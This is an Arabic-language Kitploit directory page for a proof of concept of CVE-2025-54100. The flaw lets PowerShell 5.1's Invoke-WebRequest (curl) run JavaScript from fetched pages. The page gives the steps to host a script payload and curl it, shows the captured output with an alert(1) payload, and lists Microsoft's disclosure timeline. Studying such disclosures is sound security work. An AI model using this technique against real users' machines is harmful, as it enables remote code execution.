Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-54100 — إثبات المفهوم لـ CVE-2025-54100: ثغرة XSS في PowerShell's Invoke-WebRequest عبر mshtml.HTMLDocumentClass، مما يتيح تنفيذ التعليمات البرمجية عن بُعد عند استخدام curl على JavaScript خبيث. | Kitploit
أدوات/GitHubGitHub/osman1337-security/cve-2025-54100
تحليل الثغرات الأمنيةالاستغلالأمن الويبالقيادة والسيطرةأداة الوصول عن بعد
GitHubosman1337-security/cve-2025-54100

CVE-2025-54100

إثبات المفهوم لـ CVE-2025-54100: ثغرة XSS في PowerShell's Invoke-WebRequest عبر mshtml.HTMLDocumentClass، مما يتيح تنفيذ التعليمات البرمجية عن بُعد عند استخدام curl على JavaScript خبيث.

عرض المستودع
23549منذ 8 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-54100

يستخدم أمر curl في Powershell أمر Invoke-WebRequest داخليًا.

root@kitploit:~
PS C:\Users\melih> curl

cmdlet Invoke-WebRequest at command pipeline position 1
Supply values for the following parameters:
Uri:

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.5

بالنظر إلى توثيق المعامل UseBasicParsing،

لقد أصبح هذا المعامل مهملًا. بدءًا من PowerShell 6.0.0، تستخدم جميع طلبات الويب التحليل الأساسي فقط. تم تضمين هذا المعامل لأغراض التوافق مع الإصدارات السابقة فقط، ولا يؤثر أي استخدام له على عمل الأمر cmdlet.

تكمن المشكلة في UseBasicParsing الخاص بالأمر cmdlet Invoke-WebRequest في Powershell. يعتمد UseBasicParsing على التحليل الأساسي، ولا يقوم بتقييم أي كود جافاسكريبت. إنه يقرأ النص ويحلله فقط.

إذا لم يتم توفير هذا المعامل، يقوم Invoke-WebRequest بتشغيل Internet Explorer في الخلفية ويحاول تحليل كود html من خلال تقييمه فعليًا باستخدام mshtml.HTMLDocumentClass. يؤدي تنفيذ طلب curl إلى موقع ويب يستضيف كود جافاسكريبت إلى تنفيذ الكود على متصفح العميل، وهو في حالتنا نافذة الطرفية في ويندوز.

يمكن العثور على توثيق mshtml.HTMLDocumentClass أدناه.

https://learn.microsoft.com/en-us/dotnet/api/system.windows.forms.htmldocument

بالنظر إلى دورة الحياة من الوثيقة الأولى أعلاه يمكننا أن نرى أن،

Windows PowerShell 5.1 أغسطس 2016 صدر في Windows 10 Anniversary Update وWindows Server 2016، WMF 5.1 PowerShell 6.0 20 يناير 2018 إلى 13 فبراير 2019 مبني على .NET Core 2.0 (https://github.com/dotnet/core/blob/main/release-notes/2.0/2.0-supported-os.md)

بعد بعض التحقيقات لاحظنا أن أحدث إصدارات ويندوز 11 و Server 22 و25 تأتي مع إصدار قديم من Powershell (5.1 وهو الافتراضي) وهو عرضة لهجمات XSS.

تثبيت جديد لـ Windows Server 22، alt text

PoC

الهجوم بسيط جدًا؛

  • قُم باستضافة موقع ويب يحتوي على حمولة برمجية (script payload).
  • نفّذ الأمر curl على الموقع وسترى التنفيذ

alt text

root@kitploit:~
PS C:\Users\melih> curl 172.27.223.167:8000/a.js


StatusCode        : 200
StatusDescription : OK
Content           : <script>alert(1)</script>

RawContent        : HTTP/1.0 200 OK
                    Content-Length: 26
                    Content-Type: text/javascript
                    Date: Tue, 09 Dec 2025 15:50:40 GMT
                    Last-Modified: Tue, 09 Dec 2025 15:47:18 GMT
                    Server: SimpleHTTP/0.6 Python/3.12.3

                    <script>a...
Forms             : {}
Headers           : {[Content-Length, 26], [Content-Type, text/javascript], [Date, Tue, 09 Dec
                    2025 15:50:40 GMT], [Last-Modified, Tue, 09 Dec 2025 15:47:18 GMT]...}
Images            : {}
InputFields       : {}
Links             : {}
ParsedHtml        : mshtml.HTMLDocumentClass
RawContentLength  : 26


يمكنك أن تكون مبدعًا وتنفّذ أشياء مثل open("about:blank").

alt text

يجب أيضًا أن نضع في الاعتبار أن هذا يمكن استخدامه في سلاسل أكبر مثل استغلالات المتصفح لتحقيق تنفيذ موثوق أو إجبار المتصفح على العرض.

الجدول الزمني لتحديث MSRC

  • 15 أكتوبر 2025 – تم إرسال الثغرة إلى فريق أمن مايكروسوفت عبر MSRC.
  • 16 أكتوبر 2025 – أبلغنا الفريق بأنهم بدأوا مراجعة التقرير.
  • 17 نوفمبر 2025 – أكد الفريق الثغرة وأبلغنا أنهم سيصلحونها. الرسالة الكاملة من فريق MSRC: «لقد أكدنا السلوك الذي أبلغت عنه. سنواصل تحقيقنا ونحدد كيفية معالجة هذه المشكلة. يرجى إبلاغي إذا كانت لديك معلومات إضافية يمكن أن تساعد في تحقيقنا، أو إذا كانت لديك أسئلة.»
  • 25 نوفمبر 2025 - تم تصنيف التقرير على أنه Severity: Important، Security Impact: Remote Code Execution وحصل على مكافأة قدرها $5,000.

alt text

تنزيل الأداة